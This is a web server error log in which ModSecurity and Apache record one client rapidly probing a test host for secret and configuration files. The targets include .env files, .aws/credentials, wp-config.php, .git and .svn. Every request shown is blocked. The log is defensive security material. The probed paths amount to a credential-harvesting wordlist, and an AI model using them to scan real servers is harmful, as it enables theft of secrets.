[Tue Mar 25 06:20:19.885344 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-I9E1Z2Q2QNAyAImxZPFQAAAAE"]
[Tue Mar 25 06:20:19.991932 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Tue Mar 25 06:20:20.036252 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Mar 25 06:20:20.156351 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
[Tue Mar 25 06:20:20.275270 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPHQAAAAE"]
[Tue Mar 25 06:20:20.275562 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPHQAAAAE"]
[Tue Mar 25 06:20:20.275768 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPHQAAAAE"]
[Tue Mar 25 06:20:20.869145 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Mar 25 06:20:20.899080 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Tue Mar 25 06:20:20.959539 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Tue Mar 25 06:20:20.986712 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPJwAAAAE"]
[Tue Mar 25 06:20:20.986957 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPJwAAAAE"]
[Tue Mar 25 06:20:20.987154 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-I9FFZ2Q2QNAyAImxZPJwAAAAE"]
[Tue Mar 25 06:20:21.008685 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPKAAAAAE"]
[Tue Mar 25 06:20:21.008924 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPKAAAAAE"]
[Tue Mar 25 06:20:21.009104 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPKAAAAAE"]
[Tue Mar 25 06:20:21.926154 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPLAAAAAE"]
[Tue Mar 25 06:20:21.926528 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPLAAAAAE"]
[Tue Mar 25 06:20:21.926705 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-I9FVZ2Q2QNAyAImxZPLAAAAAE"]
[Tue Mar 25 06:20:21.949878 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Tue Mar 25 06:20:22.013544 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPLwAAAAE"]
[Tue Mar 25 06:20:22.013792 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPLwAAAAE"]
[Tue Mar 25 06:20:22.013974 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPLwAAAAE"]
[Tue Mar 25 06:20:22.735789 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPMwAAAAE"]
[Tue Mar 25 06:20:22.736019 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPMwAAAAE"]
[Tue Mar 25 06:20:22.736186 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPMwAAAAE"]
[Tue Mar 25 06:20:22.822986 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPNAAAAAE"]
[Tue Mar 25 06:20:22.823237 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPNAAAAAE"]
[Tue Mar 25 06:20:22.823440 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-I9FlZ2Q2QNAyAImxZPNAAAAAE"]
[Tue Mar 25 06:20:22.904741 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:23.475873 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPNgAAAAE"]
[Tue Mar 25 06:20:23.476111 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPNgAAAAE"]
[Tue Mar 25 06:20:23.476306 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPNgAAAAE"]
[Tue Mar 25 06:20:23.496703 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:23.519985 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:23.558686 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 25 06:20:23.581933 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Tue Mar 25 06:20:23.742969 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPPgAAAAE"]
[Tue Mar 25 06:20:23.743216 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPPgAAAAE"]
[Tue Mar 25 06:20:23.743390 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-I9F1Z2Q2QNAyAImxZPPgAAAAE"]
[Tue Mar 25 06:20:24.262311 2025] [php:error] [pid 2005447] [client 170.39.218.176:48120] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Tue Mar 25 06:20:24.365914 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Tue Mar 25 06:20:24.466219 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Tue Mar 25 06:20:25.083849 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPTgAAAAE"]
[Tue Mar 25 06:20:25.084105 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPTgAAAAE"]
[Tue Mar 25 06:20:25.084288 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPTgAAAAE"]
[Tue Mar 25 06:20:25.248481 2025] [authz_core:error] [pid 2005447] [client 170.39.218.176:48120] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Tue Mar 25 06:20:25.714745 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPUQAAAAE"]
[Tue Mar 25 06:20:25.715008 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPUQAAAAE"]
[Tue Mar 25 06:20:25.715310 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPUQAAAAE"]
[Tue Mar 25 06:20:25.877192 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPVQAAAAE"]
[Tue Mar 25 06:20:25.877437 2025] [:error] [pid 2005447] [client 170.39.218.176:48120] [client 170.39.218.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-I9GVZ2Q2QNAyAImxZPVQAAAAE"]
